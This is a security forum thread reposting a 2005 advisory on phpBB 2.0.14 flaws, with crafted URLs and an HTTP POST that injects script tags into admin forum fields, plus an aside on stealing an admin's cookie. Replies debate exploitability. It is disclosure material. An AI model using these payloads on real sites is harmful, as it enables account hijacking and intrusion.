Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: October 20, 2025 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 64 Members: 0 Total: 64 Full disclosure CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS apis.google.com - Insecure redirect via __lu parameter(exploited in the wild) Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS) Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS) [SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal [SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files CVE-2025-59397 - Open Web Analytics SQL Injection Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11 Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885) Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow IT Security and Insecurity Portal www.waraxe.us Forum Index -> PhpBB -> -==phpBB 2.0.14 Multiple Vulnerabilities==- by HaCkZaTaN View previous topic :: View next topic -==phpBB 2.0.14 Multiple Vulnerabilities==- by HaCkZaTaN Posted: Sun Apr 24, 2005 2:10 am LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman Code: * -------------------------------------------------------- [N]eo [S]ecurity [T]eam [NST]? - Advisory #14 - 17/04/05 -------------------------------------------------------- Program: phpBB 2.0.14 Homepage: http://www.phpbb.com Vulnerable Versions: phpBB 2.0.14 & Lower versions Risk: Low Risk!! Impact: Multiple Vulnerabilities. -==phpBB 2.0.14 Multiple Vulnerabilities==- --------------------------------------------------------- - Description --------------------------------------------------------- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. - Tested --------------------------------------------------------- localhost & many forums - Explotation --------------------------------------------------------- -==Bad Filter of HTML Code==- phpBB2/profile.php?mode=viewprofile&u=\[]phpBB2/viewtopic.php?p=3&highlight=\[]######################################################### -==XSS==- POST /admin/admin_forums.php?sid=7bd54a5a9861ef180af78897e70 HTTP/1.1 forumname=&lt;script&gt;alert('NST')&lt;/script&gt;&forumdesc=&lt;script&gt;alert('NST')&lt;/script&gt;&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create new forum Some people cannot find it interest someones yes but well i dont care because if you put some effort you know that you can do a lot with this, like fooling the Admin of the Hosting to get his cookie & and then get access to whm... - References -------------------------------------------------------- http://neosecurityteam.net/Advisories/Advisory-14.txt - Credits ------------------------------------------------- Discovered by HaCkZaTaN <hck_zatan hotmail com> [N]eo [S]ecurity [T]eam [NST]? - http://neosecurityteam.net/ Got Questions? http://neosecurityteam.net/ Irc.gigachat.net #uruguay [NeoSecurity IRC] - Greets -------------------------------------------------------- Paisterist Daemon21 LINUX erg0t uyx CrashCool Makoki KingMetal r3v3ng4ns And my Colombian people @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@@@@'''''@@@ '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@ */ /* EOF */ http://neosecurityteam.net/ Posted: Wed Apr 27, 2005 7:06 pm KingOfSka Advanced user Joined: Mar 13, 2005 Posts: 61 can't understand how to make it work lol i get a blank profile every time i try.. Posted: Thu Apr 28, 2005 7:49 pm gulftech Valuable expert Joined: Apr 20, 2005 Posts: 9 1) Putting any non integer based value that doesn't return a record will result in the blank profile. 2) The regex issue in highlight is more of a bug than a security issue. I could be wrong, but I have glanced at the code an don't see it as exploitable. It is a bug though and should be fixed I guess. 3) I have never heard of cross site scripting when using the post method, but I could see how POST cross site scripting could be exploited. For example, you could have an auto submitted form using javascript, but in this example a valid session id is required so it is not exploitable. Posted: Sat May 21, 2005 12:30 pm Twinky Regular user Joined: May 20, 2005 Posts: 5 how do i use this can sum1 plz explain Last edited by Twinky on Sat May 21, 2005 10:40 pm; edited 1 time in total Posted: Sat May 21, 2005 9:58 pm g30rg3_x Active user Joined: Jan 23, 2005 Posts: 31 Location: OutSide Of The PE i'm just going to repeat that hackzatan my team-mate on NsT say to king of ska: HaCkZaTaN wrote: Is just if u have admin rights nothing much Peace!!!!!!!! http://neosecurityteam.net/viewtopic.php?t=225 -==phpBB 2.0.14 Multiple Vulnerabilities==- by HaCkZaTaN www.waraxe.us Forum Index -> PhpBB You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 1 All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.035 Seconds